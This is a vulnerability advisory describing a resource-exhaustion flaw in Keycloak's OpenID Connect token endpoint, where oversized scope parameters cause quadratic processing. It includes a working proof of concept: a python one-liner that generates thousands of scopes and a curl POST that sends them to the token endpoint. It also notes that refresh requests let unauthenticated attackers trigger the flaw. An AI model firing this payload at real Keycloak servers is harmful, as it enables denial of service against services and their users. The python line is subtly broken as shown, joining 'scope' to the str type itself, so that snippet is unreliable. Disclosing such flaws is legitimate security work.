When receiving a POST request on the OpenID Connect token endpoint,
Keycloak fails to limit the passed-in scopes, which leads to a high
resource usage in Keycloak.

1. Generate a long list of scopes

```
SCOPE_5K=$(python3 -c "print(' '.join(['scope'+str for i in range(5000)]))")
echo "Scope parameter length: ${#SCOPE_5K} bytes"
```

2. Post a ROPC Grant:

```
time curl -s -o /dev/null -w "admin-cli 5K scopes: HTTP %{http_code}
(%{time_total}s)\n" \
-X POST "${KC_URL}/realms/master/protocol/openid-connect/token" \
-d "grant_type=password&client_id=admin-cli&username=x&password=x&scope=${SCOPE_5K}"
```

Root cause: TokenManager.getRequestedClientScopes() at line 658
performs String.contains() on the entire scope parameter string for
each default client scope, resulting in O(n²) processing time.

A single POST request with ~49KB of scope values causes 38.6 seconds
of server-side processing; with ~99KB it reaches 151.8 seconds

The same problem occurs for client credential grants and token
refreshes - in the case of token refreshes the problem occurs even
before checking the token, so any token can be used, allowing any
unauthenticated attacker to perform this.